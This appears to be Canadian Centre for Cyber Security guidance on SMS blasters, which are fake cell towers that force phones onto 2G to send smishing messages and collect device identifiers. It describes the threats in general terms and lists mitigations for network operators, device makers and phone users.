<p><abbr title="short message service">SMS</abbr> blasters can impersonate cellular towers to take advantage of inherent or unpatched vulnerabilities found in older second generation (2G) network standards that are still supported by modern devices. 2G network standards do not enforce authentication or encryption between the mobile device and the network.</p> <p><abbr title="short message service">SMS</abbr> blasters can broadcast higher power signals such as fourth generation (4G) and fifth generation (5G) network signals to trick nearby devices into connecting by broadcasting a stronger signal than the current connection. After the connection has been established, the <abbr title="short message service">SMS</abbr> blaster will attempt to downgrade the device to 2G mode. This allows threat actors to bypass the protections and filters implemented by mobile network operators (MNOs) to protect their customers.</p> <h2 class="text-info" id="2">Threats posed by <abbr title="short message service">SMS</abbr> blasters</h2> <p><abbr title="short message service">SMS</abbr> blasters pose many threats to devices within range of a compromised device. These threats include:</p> <h3>Smishing and fraud</h3> <p>Smishing is a scam in which threat actors send fraudulent messages that look legitimate to trick victims into clicking links and attachments or sharing sensitive information. <abbr title="short message service">SMS</abbr> blasters allow threat actors to quickly send thousands of smishing messages to mobile devices within the coverage area of the device. The messages can be generic or tailored for a specific scenario, such as sporting events or conferences, or to a source, such as bank authentication <abbr title="personal identification number">PIN</abbr>s.</p> <p>When bypassing <abbr title="mobile network operator">MNO</abbr> network security, the links in <abbr title="short message service">SMS</abbr> messages are not analyzed and canāt be assessed for legitimacy. This makes it easier for threat actors to impersonate legitimate businesses and their websites. Smishing scams bypass network security, making them, and the links found in them, more dangerous.</p> <p>Smishing scams can lead to fraud with compromised credentials, unauthorized transactions and identity theft. For more details on smishing, see the Cyber Centreās <a href="/en/guidance/smishing-protect-yourself-sms-attacks-itsap00103">Smishing: Protect yourself from <abbr title="short message service">SMS</abbr> attacks (ITSAP.00.103)</a>.</p> <h3>Misinformation, disinformation and malinformation</h3> <p>By using <abbr title="short message service">SMS</abbr> blasters to conduct smishing and fraud, threat actors can spread misinformation, disinformation and malinformation (MDM). The threat can target all devices within the coverage area of the <abbr title="short message service">SMS</abbr> blaster and spread <abbr title="misinformation, disinformation and malinformation">MDM</abbr> concerning a specific source or event. Spreading <abbr title="misinformation, disinformation and malinformation">MDM</abbr> in this context is a serious concern. It can cause harm by manipulating individuals and organizations into thinking there is a conflict or urgency.</p> <h3>Service disruption</h3> <p><abbr title="short message service">SMS</abbr> blasters can cause dropped calls, slow data speeds and strain mobile infrastructure by downgrading connected devices to the 2G network. This can affect emergency calls and connection to Internet of Things (IoT) devices.</p> <h3>Privacy and data loss</h3> <p><abbr title="short message service">SMS</abbr> blasters can collect sensitive data that includes identifiable information, such as:</p> <ul><li>unique subscriber identification (international mobile subscriber identity (IMSI))</li> <li>unique device identification (international mobile equipment identity (IMEI))</li> <li>user locations</li> </ul><p>Threat actors can further use this information as entry points for more advanced cyber campaigns.</p> <!–** TOP OF PAGE ******–> <div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="3">How to protect against <abbr title="short message service">SMS</abbr> blasters</h2> <p><abbr title="mobile network operators">MNOs</abbr>, device manufacturers and end users should consider the following mitigation strategies to protect mobile devices from <abbr title="short message service">SMS</abbr> blasters.</p> <h3>Mitigation strategies for mobile network operators</h3> <ul><li><strong>Detect and respond quickly:</strong> <ul><li>Use tools that can spot fake cellular towers and monitor network logs for unusual activities, such as unknown neighbour cell towers, sudden handover failures and rapid disconnections and reconnections</li> <li>Implement standalone solutions to monitor the signaling layer to identify sudden spikes in signaling volume or abnormal registration patterns that indicate a rogue base station is active</li> <li>Use analytics with spam reporting to catch abnormal <abbr title="short message service">SMS</abbr> patterns or suspicious device identification</li> </ul></li> <li><strong>Implement Rich Communication Services:</strong> Transition from standard <abbr title="short message service">SMS</abbr> to Rich Communication Services (RCS) to offer a more secure messaging protocol with verified sender identifiers and encryption</li> <li><strong>Share intelligence:</strong> <ul><li>Feed real-time network data into fraud management systems, update blocklists or malicious Uniform Resource Locators (URLs) and share threat information with other operators and government authorities</li> <li>Use specialized direction-finding equipment to pinpoint the exact location of active <abbr title="short message service">SMS</abbr> blasters, allowing law enforcement to seize the hardware</li> </ul></li> <li><strong>Coordinate across the industry:</strong> Collaborate with device makers and regulators to improve privacy features and strengthen defense mechanisms</li> </ul><h3>Mitigation strategies for device manufacturers</h3> <ul><li><strong>Offer users more security control:</strong> <ul><li>Provide options for users to disable 2G network connections</li> <li>Enforce the use of encryption with the mobile network</li> </ul></li> <li><strong>Improve security features:</strong> <ul><li>Offer clearly defined options for how users can select and restrict network connections</li> <li>Disable 2G network usage by default</li> <li>Use applications for messages securely (for example, allowing users to accept the risk before enabling <abbr title="short message service">SMS</abbr> messaging)</li> </ul></li> </ul><h3>Mitigation strategies for end users</h3> <ul><li><strong>Use phishing-resistant multi-factor authentication (MFA):</strong> Use authentication apps or hardware security keys rather than <abbr title="short message service">SMS</abbr>-based codes and one-time passwords</li> <li><strong>Stop, verify and report:</strong> <ul><li><strong>Stop:</strong> Refrain from clicking on links or attachments in unsolicited <abbr title="short message service">SMS</abbr> and avoid responding to suspicious or unexpected messages</li> <li><strong>Verify:</strong> Contact the organization or individual directly through their official channels, such as the contact information listed on their official website</li> <li><strong>Report:</strong> <ul><li>Forward the suspicious message to 7-7-2-6 (āSPAMā) or use the messaging applicationās spam reporting function</li> <li>Report the incident to the Royal Canadian Mounted Police via the <a href="https://reportcyberandfraud.canada.ca/">Report cybercrime and fraud portal</a>. This will notify the appropriate organizations to initiate an investigation and take appropriate actions</li> </ul></li> </ul></li> <li><strong>Disable 2G:</strong> <ul><li>Turn off 2G network connections in your phoneās settings, if the option is available</li> <li>Contact your mobile provider if you donāt have the option</li> </ul></li> <li><strong>Use end-to-end encryption applications:</strong> Protect the contents within messaging and data transfer communications with applications that support end-to-end encryption</li> <li><strong>Be skeptical:</strong> Remember that legitimate organizations never ask for personal information, passwords or banking information through messages</li> <li><strong>Install applications safely:</strong> <ul><li>Only download applications from official app stores or from developers with a verified reputation</li> <li>Use an anti-virus software to scan newly downloaded and existing apps on your device for malware</li> </ul></li> </ul><p>As <abbr title="short message service">SMS</abbr>-based authentication and notifications continue to be default for many applications, threat actors will continue to exploit its vulnerable nature. To address these challenges, collaboration among the industry is essential for raising awareness and implementing robust security measures.</p> <h2 class="text-info" id="4">Learn more</h2> <ul class="lst-spcd"><li><a href="/en/guidance/using-your-mobile-device-securely-itsap00001">Using your mobile device securely (ITSAP.00.001)</a></li> <li><a href="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks">Don’t take the bait: Recognize and avoid phishing attacks (ITSAP.00.101)</a></li> <li><a href="/en/guidance/how-identify-misinformation-disinformation-and-malinformation-itsap00300">How to identify misinformation, disinformation, and malinformation (ITSAP.00.300)</a></li> <li><a href="/en/guidance/steps-effectively-deploying-multi-factor-authentication-mfa-itsap00105">Steps for effectively deploying multi-factor authentication (MFA) (ITSAP.00.105)</a></li> <li><a href="https://www.getcybersafe.gc.ca/en/blogs/reporting-spam-text-messages-7726">Reporting spam text messages to 7726</a></li> </ul></div> </div> </div> </div> </div> </article>
- Joint guidance on the careful adoption of agentic artificial intelligence servicesby Canadian Centre for Cyber Security on May 1, 2026 at 5:02 pm
This joint guidance is intended for organizations that are considering developing or deploying agentic AI systems. It outlines security considerations related to LLMs and AI and describes the key risks associated with agentic AI.









